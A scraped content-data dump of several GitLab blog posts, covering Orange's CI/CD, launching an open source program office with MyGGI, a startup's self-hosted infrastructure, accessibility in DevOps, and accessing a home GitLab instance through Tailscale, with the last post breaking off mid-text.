Whether you like our choices or not, we want to hear from you. Your inputs are even more valuable to help us improve *to be continuous* and cover as many use cases as possible.\n\nBut anyway, never forget this: [`include`](https://docs.gitlab.com/ee/ci/yaml/#include) is undoubtedly the feature that makes CI/CD standardization possible in your company (and beyond).\n\nCover image by [Graphic Node](https://unsplash.com/@graphicnode) on [Unsplash](https://unsplash.com/photos/yi1YB_FubH8)\n{: .note}\n",[685,9,1036],{"slug":2994,"featured":6,"template":689},"how-orange-uses-gitlab-ci-cd-for-modern-devops","content:en-us:blog:how-orange-uses-gitlab-ci-cd-for-modern-devops.yml","How Orange Uses Gitlab Ci Cd For Modern Devops","en-us/blog/how-orange-uses-gitlab-ci-cd-for-modern-devops.yml","en-us/blog/how-orange-uses-gitlab-ci-cd-for-modern-devops",{"_path":3000,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3001,"content":3007,"config":3013,"_id":3015,"_type":14,"title":3016,"_source":16,"_file":3017,"_stem":3018,"_extension":19},"/en-us/blog/how-start-ospo-ten-minutes-using-gitlab",{"title":3002,"description":3003,"ogTitle":3002,"ogDescription":3003,"noIndex":6,"ogImage":3004,"ogUrl":3005,"ogSiteName":673,"ogType":674,"canonicalUrls":3005,"schema":3006},"Start an open source center of excellence in 10 minutes using GitLab","Launch your own open source program office using the OSPO Alliance's tools on GitLab","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682593/Blog/Hero%20Images/opensign.jpg","https://about.gitlab.com/blog/how-start-ospo-ten-minutes-using-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Start an open source center of excellence in 10 minutes using GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Boris Baldassari\"}],\n        \"datePublished\": \"2023-01-30\",\n      
}",{"title":3002,"description":3003,"authors":3008,"heroImage":3004,"date":3010,"body":3011,"category":801,"tags":3012},[3009],"Boris Baldassari","2023-01-30","\nNow that open source has finally become a mainstream topic of conversation in the software industry, many organizations are increasingly curious about best practices for consuming, using, managing, and contributing to open source software projects. Open source software can seem alien and intimidating for organizations unfamiliar with it, and participating meaningfully and effectively in the open source ecosystem can be challenging.\n\nOrganizations especially serious about working in open source have formed [open source program offices](https://opensource.com/business/16/5/whats-open-source-program-office) (OSPOs) to spearhead their efforts. These offices are centers of excellence for an organization's ongoing work in open source. They help the organization realize the benefits of working with open source communities to accelerate innovation and build more secure tools.\n\nPerhaps your organization is considering establishing an OSPO. If it is, you likely have questions about how to get started – and especially about the best ways to help your organization become a valuable participant in the open source ecosystem.\n\nThe [OSPO Alliance](https://ospo.zone/) can help. Formed in 2021, the OSPO Alliance connects [experienced open source practitioners](https://ospo.zone/membership/) with organizations in need of seasoned guides to the open source world. 
Since the organization's founding, its members have composed a corpus of best open source practices called the [Good Governance Initiative Handbook](https://ospo.zone/ggi/), which explores various legal, cultural, and strategic considerations organizations face when working with open source software (and, naturally, the handbook itself is openly licensed, so anyone can contribute to it).\n\nTo celebrate the launch of the GGI Handbook Version 1.1, the OSPO Alliance went a step further: We have released the [MyGGI project](https://gitlab.ow2.org/ggi/my-ggi-board), which allows organizations to quickly create the infrastructure for their own open source program offices using GitLab.\n\nNow, let's look at what the MyGGI project can help your organization accomplish, including how to use the tool to establish an OSPO built on GGI principles — in only 10 minutes.\n\n## Working with the GGI Handbook\n\nThe GGI Handbook defines 25 activities, or best practices, organized according to various goals an organization may seek to accomplish with open source. Examples of activities include recommendations like \"Manage open source skills and resources,\" \"Manage software dependencies,\" \"Upstream first,\" or \"Engage with open source projects.\" Each of these activities, then, has a corresponding description and rationale, and the handbook provides resources, tools, and hints for successfully implementing them.\n\nActivities are intentionally generic and must be adapted to your organization's specific, unique, local context. The GGI Handbook offers tools for doing this, too: scorecards. Scorecards allow you to assess your organization's engagement in and progress with various open source best practices.\n\nSo working with the GGI Handbook in your organization might look something like this:\n\n1. 
Evaluate the open source-related activities the handbook proposes and remove those that don't fit your specific context (maybe some activities will require a bit of adaptation to be more relevant to the domain, while some others may just be discarded).\n1. Identify the activities that would be most beneficial to reaching your organization's goals in engaging with open source.\n1. Construct an Agile-like, iterative process for working on a small set of these activities. Do this in the form of sprints by tracking your progress with scorecards, and adapt the activity to your local context, team cultures, and available resources as you go.\n1. At the end of each iteration, review the activities your teams have completed, select a new scope for improvement, and repeat the process.\n\nThe MyGGI project provides a push-button infrastructure for doing this work. Next, let's examine how to deploy it on GitLab.\n\n### Deploying the GGI Handbook on GitLab\n\nThe OSPO Alliance wanted to provide a quick and straightforward way for organizations to establish their own open source program activities using a dashboard, so they can start implementing the GGI Handbook's methods without delay. We didn't want to reinvent the wheel with some heavy custom tooling. Instead, we decided to build the project using tools already available to us. We had already used GitLab issues to model activities during the early stages of handbook development, so reusing this GitLab feature made most sense. By simply adding some scripting to automate the initialization of activities and updating a static website on GitLab Pages, we were able to launch the project so others could easily deploy it in their own GitLab instances.\n\nInstructions for deploying the program are available in the project's [README](https://gitlab.ow2.org/ggi/my-ggi-board/-/blob/main/README.md). Let's review them here and start your own OSPO together.\n\nFirst, we need to create a new project on our GitLab instance. 
Select `Import project`, then `From repository by URL`. \n\nNext, we will need to provide a remote URL. Copy the existing MyGGI project by using the [URL](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners/publications-and-presentations/-/tree/main) `[https://gitlab.ow2.org/ggi/my-ggi-board.git](https://gitlab.ow2.org/ggi/my-ggi-board.git)`.\n\nThen we will give our project a unique name and choose a visibility level. Here's an example of how it might look:\n\n![Repository by URL](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-1.png){: .shadow}\n\nWhen you have configured your desired settings, click `Create project` to continue.\n\nOur next step is to configure access privileges. Go to `Project Settings > Access Tokens` and create a `Project Access Token` with `API` privilege and `Maintainer` role. The project's scripts will use these to create the issues and generate the static website dashboard for your OSPO.\n\nWhen the token is created, copy it to a safe place, as **you will never be able to see it again**. Note that some GitLab instances prefer to disable the Project Access Token feature in favor of Personal Access Tokens. This is perfectly okay; the preference won't affect the deployment of this project (see the instructions for more details).\n\nHere's an example of what you will see at this stage:\n\n![Project access tokens](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-2.png){: .shadow}\n\nWe will then provide this access token to the pipelines and scripts by creating a CI/CD environment variable. Go to `Project Settings` and then `CI/CD`. Scroll to the `Variables` section and add a new variable with name `GGI_GITLAB_TOKEN`. Input the access token you created in the last step as the value. 
Here's an example:\n\n![Add variable screen](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-3.png){: .shadow}\n\nWe can now execute the pipeline to begin the process of creating your OSPO infrastructure. Go to `CI/CD`, then `Pipelines`, and click on `Run pipeline`. After a couple of minutes, the pipeline should finish and the website will deploy. You will see something like this when the pipeline finishes:\n\n![Pipeline passed screen](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-4.png){: .shadow}\n\nInfrastructure for your open source program office is now ready!\n\n### Using the tools\n\nThe MyGGI project creates a set of 25 activities, along with a nice project board to help you visualize them:\n\n![Project board](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-5.png){: .shadow}\n\nUsers can click on specific activities (rendered as issues) to read the description of the activity, understand the tools and resources that might help them complete it, and begin completing relevant scorecards. Users can also define their own perspectives on the activities, as they see them from the organization's specific context. Then they can create tasks to narrow the scope of each activity so they can iterate on it and track progress. \n\nTheir work is displayed on a static website hosted on GitLab Pages and updated nightly according to the organization's progress on various activities and tasks. This web page is especially useful to present the program and its day-to-day evolution to the organization (or the world); participants, stakeholders, and executives can review it to learn more about the various initiatives, see what work is underway, and track the overall development of the organization's open source program office. 
The initial website looks like this:\n\n![Welcome screen of website](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-6.png){: .shadow}\n\n### Running your OSPO\n\nSelecting an open source program manager to oversee the work on the project boards is beneficial at this step. That person will:\n\n- Assign issues to team members to start working on new activities, create scorecards to track the work and associated tasks, and label them as \"In Progress\" instead of \"Not Started\".\n- Oversee the evolution of the work as it moves through various iterations, completing the scorecards with local resources and information, and closing issues as tasks are complete.\n- Ensure that issues keep making progress and, as team members complete them, assign new ones.\n\nAs changes occur in both the project and its issues, your OSPO's static website will regularly update to reflect the current status of activities, tasks, and the overall progress. After some time, for instance, the dashboard may look like this:\n\n![Dashboard with current status](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-9.png){: .shadow}\n\nYou're now on your way to establishing your organization's open source program office. 
Don't hesitate to connect with the [OSPO Alliance](https://ospo.zone/) for help and support as you continue your journey!\n\n_Boris Baldassari is an open source consultant at the Eclipse Foundation Europe, and an active contributor to the OSPO Alliance._\n\nCover image by [Clay Banks](https://unsplash.com/@claybanks?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://www.unsplash.com)\n{: .note}\n\n",[9,752,685],{"slug":3014,"featured":6,"template":689},"how-start-ospo-ten-minutes-using-gitlab","content:en-us:blog:how-start-ospo-ten-minutes-using-gitlab.yml","How Start Ospo Ten Minutes Using Gitlab","en-us/blog/how-start-ospo-ten-minutes-using-gitlab.yml","en-us/blog/how-start-ospo-ten-minutes-using-gitlab",{"_path":3020,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3021,"content":3027,"config":3033,"_id":3035,"_type":14,"title":3036,"_source":16,"_file":3037,"_stem":3038,"_extension":19},"/en-us/blog/how-startups-build-it-infrastructure",{"title":3022,"description":3023,"ogTitle":3022,"ogDescription":3023,"noIndex":6,"ogImage":3024,"ogUrl":3025,"ogSiteName":673,"ogType":674,"canonicalUrls":3025,"schema":3026},"A way for startups to build a solid IT infrastructure","Seven free software solutions to cover your most important use cases.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679216/Blog/Hero%20Images/startups-it-infrastructure.jpg","https://about.gitlab.com/blog/how-startups-build-it-infrastructure","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A way for startups to build a solid IT infrastructure\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"plapadoo\"}],\n        \"datePublished\": \"2017-08-07\",\n      }",{"title":3022,"description":3023,"authors":3028,"heroImage":3024,"date":3030,"body":3031,"category":10,"tags":3032},[3029],"plapadoo","2017-08-07","\n\n *plapadoo is a software startup from 
Hannover, Germany, providing tailored, high-quality software engineering to their clients. They fill us in on how they chose solutions for their IT infrastructure, including communication, backups, [CI/CD](/topics/ci-cd/) and more.*\n\n\u003C!-- more -->\n\nWe recently founded [our company](https://plapadoo.de/) and so one of the first things to do was to get our infrastructure up and running. As a software startup, our technical infrastructure is the heart of our company. It influences our productivity, has impact on our costs and offers a great chance to set us apart from the competition. Having a good infrastructure is also key to saving us money and increasing development speed.\n\nWhen planning the setup of our infrastructure, we kept two things in mind: First, we wanted to have open source software running wherever possible, and second, we wanted to use strong encryption for both communication and data storage. Also, we prefer lightweight software with few dependencies. Below, you find a small list of important use cases and which software we use to cover them:\n\n- [Chat](#chat) ([Matrix](https://matrix.org/)/[Riot](https://about.riot.im/) web app + Android app)\n- [Email](#email) (self-hosted [Dovecot](https://www.dovecot.org/) + [Postfix](http://www.postfix.org/) + [Sieve](http://sieve.info/) + [SpamAssasin](http://spamassassin.apache.org/))\n- [Calendar and Contacts](#calendar-and-contacts) ([Radicale](http://radicale.org/))\n- [Voice Conferencing](#voice-conferencing) ([uMurmur](http://umurmur.net/)/[Mumble](https://wiki.mumble.info/))\n- [Synchronization of files across multiple devices](#data-storage) ([Syncthing](https://syncthing.net/))\n- [Git and Continuous Integration](#build-and-continuous-integration) ([GitLab](/stages-devops-lifecycle/) & [GitLab CI](/solutions/continuous-integration/))\n- [Backup and Traceability](#backup-and-traceability) ([borgmatic](https://github.com/witten/borgmatic) & 
[etckeeper](http://etckeeper.branchable.com/))\nBesides this, we have other services (like VPN or HTTP servers) running which are not that special and as such, are not covered on this article.\n\n## Base setup\n\nIt all starts with choosing the platform to run your software on. We decided to use [Arch Linux](https://www.archlinux.org/) as the operating system for our server. Our main reasons for choosing Arch Linux were its active community, good documentation, highly up-to-date repositories with current versions of important software, good support for disk encryption, and finally, the fact that Arch Linux has a rolling update scheme instead of a release-based one. This last point is especially important to us, since we do not want to go through the pain of upgrading our operating system from one version to the next every other year -  which usually causes lots of trouble. Furthermore, release-based distributions tend to have outdated software in their repositories. Instead, we prefer to keep our system always up to date and enjoy the latest version of any software any time.\n\nMost of our software is installed using Arch Linux’ package manager. However, in some cases [Docker](https://docker.com/) is also a good idea to use for running software. This is especially the case when software introduces dependencies you don’t want on your host system or if you are in doubt about the security of a software. Since Docker provides a certain level of isolation, security breaches don’t have as bad consequences as they have when you are running the vulnerable software directly on your host system. However, it should be kept in mind that there is the risk of a so-called container breakout. This basically means that your host system can be subject to an attack even if the vulnerable software is running inside a Docker container. 
Other reasons for using Docker can be wanting to try something out without messing up your host system or maybe software is simply not available for your Linux distribution. Of course, there are many other advantages to containerization, but we won’t be covering those today.\n\n## Communication\n\nCommunication, and using appropriate communication channels has been central to us since the very beginning. We wanted a means of communicating that was secure, fast, reliable, and easily accessible from any device. This applies to chat, email, contacts and calendar entries.\n\n### Chat\n\nFor chatting, we needed a solution which supported the concept of a “room” or “channel,” so as to keep discussions clear and separated from each other. We found Matrix/Synapse and Riot to be a perfect solution. While we also tried alternatives, such as Rocket.Chat and Mattermost, we liked Riot/Matrix the most because of its native Android app, its active development, and an open API.\n\nWe are using the Matrix API to run custom chat bots. These bots have become quite an important factor in our company, since they massively increase transparency and information distribution among the team. For example, we have bots to inform us about new commits being pushed to our GitLab server, new calendar entries being created in our shared calendar, successful or failed builds and so on. We will cover these bots in detail in an upcoming article.\n\n### Email\n\nSince we want to have complete control over the data belonging to our core business, we use a private mail server. It is indeed challenging to set up securely, but we still decided to go with it because of how important secure and private communication is to us. We had to read a lot of documentation before we could set it up, most importantly to prevent a security hole in the system. Not doing that would possibly mean ending up on a spammer blacklist, since someone could be abusing our mail server, or an attacker gaining access to our mail. 
It is a lot of work, but we definitely recommend taking the time to understand every step of the process and avoid any mistakes. On the client side, we seek to encrypt our emails using PGP whenever possible.\n\n### Calendar and contacts\n\nIn order to have a shared calendar as well as a shared address book, we are running Radicale, which is a lightweight CalDAV and CardDAV server. Although it is not easy to configure, it comes with support for Git and just quietly does its job in the background. We have never experienced any problems with this software so far and like it for its reliability. For Android and iOS, there are CalDAV and CardDAV adapters available to synchronize everything with your phone.\n\n### Voice Conferencing\n\nFor voice conferencing, it was very important to us to have a trustworthy open source solution in place. Proprietary solutions always come at the risk of backdoors being shipped along with them. We decided to give Mumble a try. Mumble is an open source voice client that requires a central server to handle all the traffic. The official server implementation is called Murmur. When installing Murmur, we learned that it pulls in a giant bunch of dependencies.\n\nAmong those dependencies are things such as X11 which most people don’t want on their servers. The problem with such dependencies is that they introduce potential attack surfaces as well as costing time, money, and other resources to maintain and update them. So you normally want as few dependencies as possible. This alone would make it a bad fit for us, but we still decided to give it a try. One option would have been to run Murmur inside a Docker container where the mentioned dependencies wouldn’t bother us too much. While we were configuring Murmur, we had to choose a server password. As always, we generated a long, strong password with about 60 random characters (including special characters). As we started the server and tried to connect a client, we were completely shocked. 
Murmur let clients in without requiring a password.\n\nWe found out that Murmur seems to have a problem with long passwords and then just ignores them. So if you configure Murmur with the goal of strong security, you get no security at all. Needless to say that we immediately uninstalled Murmur and all of the crazy dependencies it introduced.\nWhile looking for alternatives, we soon discovered uMurmur which is an alternative Mumble server implementation aiming at embedded systems. It comes with few dependencies and generally seems to be well implemented. We installed it, did not experience any issues with long passwords and have been using it ever since without any problem. The communication is encrypted using a TLS certificate.\n\n## Data storage\n\n![box files](https://about.gitlab.com/images/blogimages/startups-it-infrastructure-body.jpg){: .shadow}\n\nAnother important aspect within a company besides communication is the need to store and distribute documents among its different stakeholders.\nWhen sharing data, most programmers will normally use Git. However, Git is not the best choice for sharing binary data such as documents, photos, videos, etc., because one usually doesn’t need to keep different versions of these files. A common approach is to use ownCloud/NextCloud for data sharing, but since we really don’t like PHP, we precluded these two applications.\n\nInstead, we discovered Syncthing. Once you understand the concept of Syncthing, it is easy to set up, extremely easy to use and it just works out of the box. Syncthing can be described as a software which synchronizes data across several nodes. We have one Syncthing instance running on our server that acts as a kind of master node, although a master is not explicitly needed -  Syncthing is completely decentralized. We also run Syncthing on our desktops and phones. Each Syncthing node has a unique ID, which has to be added using the web interface of the master node in order to share data with them. 
For the local node, the unique ID of the master node has to be added accordingly. Using this concept of a master node, we don’t have to wire all our devices to each other -  it is enough to just wire each device to the master node.\n\nAfter that, you can select which folders should be shared using Syncthing. Syncthing will then automatically upload any new data you put into these folders to the remote node. Data added by other users is downloaded to the clients on the fly, and deletions of files, changes, etc. are also applied locally. For Android, there is a native Syncthing app available which does exactly the same. By using Syncthing, all our devices always have the latest version of the data stored inside the Syncthing shares on the master node.\n\n## Build and continuous integration\n\nFor Git and continuous integration, we use GitLab, which already comes with integrated CI features. Although GitLab is quite resource-hungry, it provides lots of very nice features such as an integrated issue tracker and the “snippets” area -  where you can paste code snippets and share them. GitLab is well documented and has an open API. It features webhooks that you can use to trigger HTTP requests whenever commits are pushed, CI pipelines start, and so on. We use that to generate notifications in matrix rooms corresponding to the Git repositories. So, for example, if someone pushes a commit to project “foo,” we get a notification in a Matrix room “room about foo,” which is linked to this project.\n\n>GitLab provides lots of very nice features such as an integrated issue tracker and the “snippets” area -  where you can paste code snippets and share them\n\nWe are using the official GitLab Docker image, which already includes [Prometheus](https://prometheus.io/) for monitoring. We are accessing this Prometheus instance from our host system and plot its data in a dedicated [Grafana](https://grafana.com/) dashboard. 
This way, we can monitor our GitLab server internals with very little effort.\n\nFor building a project using GitLab CI, you need a so-called “gitlab-runner” that acts as a build agent. There are also official Docker images available for those runners, but we have created our own Docker base image, which has some basic tools we constantly need. We use our custom base image to build individual runners for each project on top of it. This way, we have runners tailored exactly to the needs of our projects. Since the Docker socket is mapped into our runners, we can even build and deploy Docker images from within them.\n\nWe like the fact that the build jobs are defined through a “.gitlab-ci.yml” file that is versioned with each project. This way, you can track changes to the build process and always have a running build - even if you checkout an old version of a project.\n\n## Backup and traceability\n\nBacking up your data is very important. Especially nowadays with the widespread use of SSDs, when fatal disk failure is likely to happen. Other reasons for data loss may be accidental deletion or attacks. We are using [BorgBackup](https://borgbackup.readthedocs.io/) together with borgmatic, which is a nice, simple, incremental, and highly automatable backup solution. You can easily specify files to exclude from the backup, and also select how many daily, weekly, monthly and yearly backups you want Borg to keep. By setting up a Cron job or systemd timer, you can fully automate the backup process. We create backups every night and store them on an NFS storage, which is only mounted when the backup process is running. This way, we avoid the backup to be deleted by an accidental `rm -rf /` or some other mishap. Borg encrypts the backups and supports compression to keep your backups safe and small. 
We like to keep track of any changes we make to the system, especially those to configuration files.\n\nFor Linux, there is a useful little tool called etckeeper, which turns your `/etc` directory into a Git repository. It also adds hooks to your package manager to automatically commit any configuration changes being performed during system updates. Using etckeeper, every configuration change corresponds to a Git commit, with an author, a timestamp and a message. This provides for much more transparency, especially when more than one person administrates a server. Also, the way Git works, accidental changes are detected and bad configurations can be easily reverted.\n\n## Summary\n\nWe explained that we, at plapadoo, prefer lightweight (in terms of dependencies), focused software over bloated solutions and favor open source software. Our custom chat bot gives us a high level of transparency and awareness, and also improves our productivity, since we always know what’s going on, even if working remotely. Lastly, we explained which software solutions we have chosen for which use cases and why.\n\nIf you liked this article, please help us reach more readers by sharing it. If you have any questions, thoughts or recommendations on the topic, feel free to comment. 
Which software solutions did you choose for your startup?\n\n_This post was originally published on [Medium](https://medium.com/plapadoo/a-way-for-startups-to-build-a-solid-it-infrastructure-a48b222fbff6/)._\n\n[CERN reception, Meyrin, Switzerland](https://unsplash.com/@samuelzeller?photo=JuFcQxgCXwA) by [Samuel Zeller](https://unsplash.com/@samuelzeller) on Unsplash.\n{: .note}\n",[9,888,910],{"slug":3034,"featured":6,"template":689},"how-startups-build-it-infrastructure","content:en-us:blog:how-startups-build-it-infrastructure.yml","How Startups Build It Infrastructure","en-us/blog/how-startups-build-it-infrastructure.yml","en-us/blog/how-startups-build-it-infrastructure",{"_path":3040,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3041,"content":3047,"config":3052,"_id":3054,"_type":14,"title":3055,"_source":16,"_file":3056,"_stem":3057,"_extension":19},"/en-us/blog/how-the-devops-platform-makes-building-accessible-software-easier",{"title":3042,"description":3043,"ogTitle":3042,"ogDescription":3043,"noIndex":6,"ogImage":3044,"ogUrl":3045,"ogSiteName":673,"ogType":674,"canonicalUrls":3045,"schema":3046},"It's time to build more accessible software. A DevOps platform can help","Shifting accessibility left can make building accessible products simpler and more efficient. A DevOps platform makes it easier to customize and adjust priorities to suit your business needs.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667281/Blog/Hero%20Images/accessibility.jpg","https://about.gitlab.com/blog/how-the-devops-platform-makes-building-accessible-software-easier","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"It's time to build more accessible software. 
A DevOps platform can help\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2021-09-21\",\n      }",{"title":3042,"description":3043,"authors":3048,"heroImage":3044,"date":3049,"body":3050,"category":1119,"tags":3051},[927],"2021-09-21","\n\nThe earlier a feature or process is introduced in the multi-step software development lifecycle (SDLC), the more likely it is to be fully integrated into the product. \n\nIt's well documented how security can [shift left using a DevOps platform](/blog/devops-platform-supply-chain-attacks/), so it's time to make the case that accessibility needs to be thought about earlier (and, clearly, a DevOps platform can facilitate that too). Although there are laws that require applications to meet certain accessibility requirements, which [opens an application up to a broader user base](/blog/how-the-open-source-community-can-build-more-accessible-products/), rarely is accessibility considered a core product requirement. Instead, it is just a test tacked on at the end instead of being built into the DevOps platform process.\n\n**[Learn more about [how the open source development community helps build accessible software](/blog/how-the-open-source-community-can-build-more-accessible-products/)]**\n\n\"The problem really is that accessibility is not usually explicitly defined as a problem,\" said Segun Ola, a frontend web developer at engineering talent finder Andela, during a presentation at accessibility conference [axe-con](https://www.deque.com/axe-con/). 
\"Most of the time, developers go through the product lifecycle and we identify all the other problems with a product or all of the things we want to solve and ignore accessibility for the greater part.\"\n\n## Accessibility in software development: It starts with education\n\nOftentimes, omissions are unintentional and have more to do with a lack of awareness around why accessibility in software development is so important for many people living with disabilities and a key driver of business value. After all, the more accessible your product, the more users can benefit from it.\n\n\"I have met software engineers and designers who did not even know that there's a thing called a screen reader,\" Ola said. \"Just last week, I was reviewing some code and explaining why the code needed to be refactored. A junior engineer asked me ‘what is a screen reader?’ So I had to get on a call with him and show him how screen readers work. And then he asks me, ‘What's the point of a screen reader?’ And I had to tell him: ‘Oh yeah there are people who can't see the way you and I see.’\"\n\nThis is just one example of why having empathy and education around accessibility is so important, says [Taurie Davis](/company/team/#tauriedavis), product design manager on Ecosystems at GitLab. Earlier in 2021, the GitLab UX team set a [goal to become a department of accessibility experts and advocates at GitLab](https://gitlab.com/groups/gitlab-org/-/epics/5235) by completing a 26-hour training at [Deque University](https://dequeuniversity.com/) on accessibility in software development.\n\n## Ignoring accessibility? Expect more technical debt\n\nSometimes software companies will see investment in accessibility components for a product as expensive and/or as a trade-off for innovation. 
Development teams that wait until the end of the SDLC to think about accessibility are more likely to have coded components that are inaccessible, only to have to go back and rework them to suit legal accessibility standards. This process can lead to an immense amount of technical debt.\n\n**Take a deep dive into [all aspects of the DevOps platform](/solutions/devops-platform/)**\n\n\"Once a team does start to become educated about accessibility and they have the empathy and have the drive to make the change and start shifting accessibility left it's easy to see all of the debt that you've accrued around accessibility,\" says Taurie. \"It can be really expensive to get yourself out of that debt.\" Taurie points to examples such as having to go back to change variables for color contrast, and ensuring that filtering and tab reordering can be done in a way that screen readers understand it.\n\n\"There are just so many different aspects and elements that could cause you to go back and just rewrite how the entire feature was originally developed and that can affect every aspect of your product,\" she adds.\n\n## Other barriers to implementing accessibility earlier\n\nFor UX designers like [Jeremy Elder](/company/team/#jeldergl), staff product designer on Ecosystems at GitLab, and Taurie, the typical workflow is about testing artifacts and responding to customer feedback, as opposed to thinking proactively about how someone might use the product.\n\n\"It’s more of a softer skill to think through a lot of those abstract ideas and what-ifs upfront rather than just saying, ‘Hey, we need this widget to do XYZ,’\" says Jeremy. \"Instead of asking questions like ‘how might somebody want to use this? How does it fit in their workflow?’. 
That is more inclusive thinking that helps you to do that, but it's harder and not as common.\"\n\n## Building accessible software isn’t just ethical, it drives business value\n\nOftentimes accessibility in software development is framed around building products to better serve people living with disabilities. While this is essential and ethical, accessibility can also be about building software products that can easily adapt to a user’s workflow.\n\n\"It’s more rigor around understanding workflows and how somebody is wanting to use it and less about focusing necessarily on a disability per se, or an outcome,\" says Jeremy. \"You want to think about personas or jobs to be done, not just think about the ultimate task, but how somebody is achieving that task.\"\n\n**[Ten key features](/topics/devops-platform/) of a DevOps platform**\n\nProducts that are customizable and adaptable are more likely to pique the interest of clients who have specific needs (e.g., a screenreader) or workflow preferences (e.g., using a particular type of keyboard).\n\n## What are the solutions?\n\nThe simplest solution to building more accessible software solutions is to think about accessibility at the beginning of the SDLC, rather than waiting until the end. Companies that use a complete DevOps platform like GitLab will find it simpler to take iterative steps toward shifting accessibility left. Need an example? Make accessibility part of the requirements a dev team needs to complete before a particular feature can be considered \"done.\" One way to do this would be to update issue templates and MR templates to ensure an accessibility step is part of the checklist.\n\nWhether it’s security or accessibility, shifting something left is about bringing the conversation to the beginning of the SDLC, something made much more straightforward with a DevOps platform. 
When it comes to accessibility, the more accessible the product is, the broader the pool of users (and future customers) can benefit.\n\n## Read more about the DevOps Platform:\n\n- [The journey to a DevOps Platform](/blog/the-journey-to-a-devops-platform/)\n\n- [How ten steps over ten years led to the DevOps Platform](/blog/how-ten-steps-over-ten-years-led-to-the-devops-platform/)\n\n- [Making the case for a DevOps platform: What data and customers say](/blog/making-the-case-for-a-devops-platform-what-data-and-customers-say/)\n\n- [Agile planning with a DevOps platform](/blog/agile-planning-with-a-devops-platform/)\n\n- [Welcome to the DevOps Platform era](/blog/welcome-to-the-devops-platform-era/)\n\n",[685,803,9],{"slug":3053,"featured":6,"template":689},"how-the-devops-platform-makes-building-accessible-software-easier","content:en-us:blog:how-the-devops-platform-makes-building-accessible-software-easier.yml","How The Devops Platform Makes Building Accessible Software Easier","en-us/blog/how-the-devops-platform-makes-building-accessible-software-easier.yml","en-us/blog/how-the-devops-platform-makes-building-accessible-software-easier",{"_path":3059,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3060,"content":3066,"config":3071,"_id":3073,"_type":14,"title":3074,"_source":16,"_file":3075,"_stem":3076,"_extension":19},"/en-us/blog/how-to-access-gitlab-on-a-private-network-with-tailscale",{"title":3061,"description":3062,"ogTitle":3061,"ogDescription":3062,"noIndex":6,"ogImage":3063,"ogUrl":3064,"ogSiteName":673,"ogType":674,"canonicalUrls":3064,"schema":3065},"How to access GitLab on a private network with Tailscale","If issues around a private network were preventing a permanent GitLab installation, Brendan O'Leary has the solution with Tailscale.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679348/Blog/Hero%20Images/locks.jpg","https://about.gitlab.com/blog/how-to-access-gitlab-on-a-private-network-with-tailscale","\n                   
     {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to access GitLab on a private network with Tailscale\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Brendan O'Leary\"}],\n        \"datePublished\": \"2022-07-21\",\n      }",{"title":3061,"description":3062,"authors":3067,"heroImage":3063,"date":3068,"body":3069,"category":801,"tags":3070},[1074],"2022-07-21","\nGitLab provides an easy-to-install package for most Linux distributions and even for devices like the [Raspberry Pi](https://docs.gitlab.com/omnibus/settings/rpi.html). However, if you want to install GitLab in a home lab or similar private network, you would then be faced with a new issue: how do you access the instance from outside that private network?\n\nTraditionally, you would set up your router to forward traffic from your public IP address to the server inside your network. However, this comes with several drawbacks:\n\n- Opening a port on your home or private network comes with a sustainable amount of risk.\n- It can be hard or impossible for folks to do depending on their internet service provider and what routing equipment they use.\n- It can be especially tough if your ISP doesn't provide you with a statically assigned IP address which means your address can change from time to time, and you'll need to either update DNS manually or through some third-party [dynamic DNS](https://www.cloudflare.com/learning/dns/glossary/dynamic-dns/) service.\n\nFor me, all of these challenges have meant that I've only ever really run GitLab \"for fun\" on my local network. Given the challenges above, running a permanent installation wasn't an option. That is until [Tailscale](https://tailscale.com) entered my life.\n\n## Tailscale\n\nTailscale isn't necessarily the \"newest\" technology. 
In fact, it is based on the [WireGuard protocol](https://www.wireguard.com/), which has existed in one form or another since 2015 and has seen native kernel support added to various Linux distributions as well as the kernel itself over the past several years.  Wireguard VPN technology makes considerable improvements in the usability and setup of virtual private networks over earlier protocols like IPsec. Even with being easier to use, the \"problem\" with WireGuard, at least for me, was always that it was still too complex to set up and maintain. Much like configuring my ISP's router for port forwarding, it wasn't _impossible_, but it just wasn't practical.\n\nEnter Tailscale. Tailscale provides a simple piece of client software, available for Linux, Mac, and Windows (and iOS and Android!), which implements the WireGuard protocol and allows you to control your VPN network from a handy web interface. Not only that, it's [free to use](https://tailscale.com/pricing/) for individuals and small networks. When I started using Tailscale, it was to make sure I could connect back to my home network and troubleshoot it while traveling for work. As the only system administrator in my house, this was fantastic.\n\nHowever, Tailscale also offers the ability to easily access services inside of various networks as well by setting up a mesh VPN between them, all with IP addresses in the 100.x.y.z range. That means for any web service or other service on my network, I can access it with a statically assigned IP address from any other device connected to Tailscale, and create a DNS record to have a domain point to the IP address. At last, I could run GitLab (and other open source tools) at home and safely connect to them from outside my house with as little hassle as possible. 
